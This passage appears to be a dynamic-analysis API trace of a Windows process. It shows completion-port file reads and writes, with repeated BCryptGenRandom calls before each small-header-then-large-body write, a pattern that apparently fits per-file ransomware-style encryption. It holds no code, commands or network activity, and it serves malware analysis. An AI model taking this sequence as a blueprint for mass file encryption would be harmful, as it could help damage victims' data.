[0159.388] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1ce5a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0159.403] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0159.418] ReadFile (in: hFile=0x2a8, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x1f86c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0159.428] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0159.437] ReadFile (in: hFile=0x2a4, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x1df43, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0159.450] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0159.454] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x184d3, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0159.464] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0159.471] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1aba5, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0159.486] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0159.488] CloseHandle (hObject=0x338) returned 1 [0159.488] free (_Block=0x1ff1e60) [0159.488] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0159.489] CloseHandle (hObject=0x2a4) returned 1 [0159.489] free (_Block=0x3d70450) [0159.489] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0160.229] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.230] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.230] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0160.230] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.230] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.230] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0160.231] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0160.231] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0160.231] free (_Block=0x3e305b8) [0160.231] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0160.231] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0160.231] free (_Block=0x1fa91d0) [0160.231] free (_Block=0x1fa2ed8) [0160.231] free (_Block=0x1fa90b8) [0160.231] WriteFile (in: hFile=0x308, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0160.265] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0160.331] WriteFile (in: hFile=0x308, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x13e20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0160.331] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0160.337] CloseHandle (hObject=0x308) returned 1 [0160.338] free (_Block=0x3f70048) [0160.338] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0160.347] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.347] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.347] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0160.348] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.348] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.348] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0160.348] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0160.348] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0160.348] free (_Block=0x3e305b8) [0160.348] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0160.348] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0160.349] free (_Block=0x1fa91d0) [0160.349] free (_Block=0x1fa2ed8) [0160.349] free (_Block=0x1fa90b8) [0160.349] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0160.349] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0160.351] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x15320, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0160.351] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0160.352] CloseHandle (hObject=0x308) returned 1 [0160.353] free (_Block=0x3df0008) [0160.353] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0160.361] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.362] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.362] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0160.362] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.362] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.362] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0160.363] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0160.363] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0160.363] free (_Block=0x3e305b8) [0160.363] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0160.363] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0160.363] free (_Block=0x1fa91d0) [0160.363] free (_Block=0x1fa2ed8) [0160.363] free (_Block=0x1fa90b8) [0160.363] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0160.364] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0160.366] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1ad40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0160.366] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0160.368] CloseHandle (hObject=0x308) returned 1 [0160.368] free (_Block=0x3df0008) [0160.368] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0160.378] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.378] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.378] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0160.378] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.379] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.379] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0160.379] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0160.379] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0160.379] free (_Block=0x3e305b8) [0160.379] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0160.379] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0160.380] free (_Block=0x1fa91d0) [0160.380] free (_Block=0x1fa2ed8) [0160.380] free (_Block=0x1fa90b8) [0160.380] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0160.380] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0160.381] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x178e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0160.382] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0160.393] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x17749, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0160.394] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0160.395] CloseHandle (hObject=0x308) returned 1 [0160.395] free (_Block=0x3df0008) [0160.395] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0160.405] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.406] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0160.406] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.406] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0160.407] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0160.407] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0160.407] free (_Block=0x3e305b8) [0160.407] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0160.407] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0160.407] free (_Block=0x1fa91d0) [0160.407] free (_Block=0x1fa2ed8) [0160.408] free (_Block=0x1fa90b8) [0160.408] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0160.408] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0160.410] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x15a80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0160.410] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0160.411] CloseHandle (hObject=0x308) returned 1 [0160.412] free (_Block=0x3df0008) [0160.412] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0160.419] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.420] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.420] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0160.420] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.420] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.420] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0160.420] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0160.420] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0160.420] free (_Block=0x3e305b8) [0160.420] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0160.421] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0160.421] free (_Block=0x1fa91d0) [0160.421] free (_Block=0x1fa2ed8) [0160.421] free (_Block=0x1fa90b8) [0160.421] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0160.421] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0160.426] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x15ff0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0160.426] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0160.438] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1a9ed, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0160.439] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0160.440] CloseHandle (hObject=0x308) returned 1 [0160.440] free (_Block=0x3df0008) [0160.440] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0160.449] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.449] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.449] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0160.449] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.450] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.450] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0160.450] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0160.450] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0160.450] free (_Block=0x3e305b8) [0160.450] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0160.450] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0160.451] free (_Block=0x1fa91d0) [0160.451] free (_Block=0x1fa2ed8) [0160.451] free (_Block=0x1fa90b8) [0160.451] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0160.451] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0160.453] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x193f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0160.453] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0160.454] CloseHandle (hObject=0x308) returned 1 [0160.454] free (_Block=0x3df0008) [0160.454] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0160.464] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.464] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0160.464] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.465] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0160.465] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0160.465] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0160.465] free (_Block=0x3e305b8) [0160.465] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0160.465] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0160.465] free (_Block=0x1fa91d0) [0160.465] free (_Block=0x1fa2ed8) [0160.465] free (_Block=0x1fa90b8) [0160.465] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0160.466] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0160.467] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x14f90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0160.467] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0160.479] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1a3f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0160.482] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0160.708] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x18ac4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0160.740] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 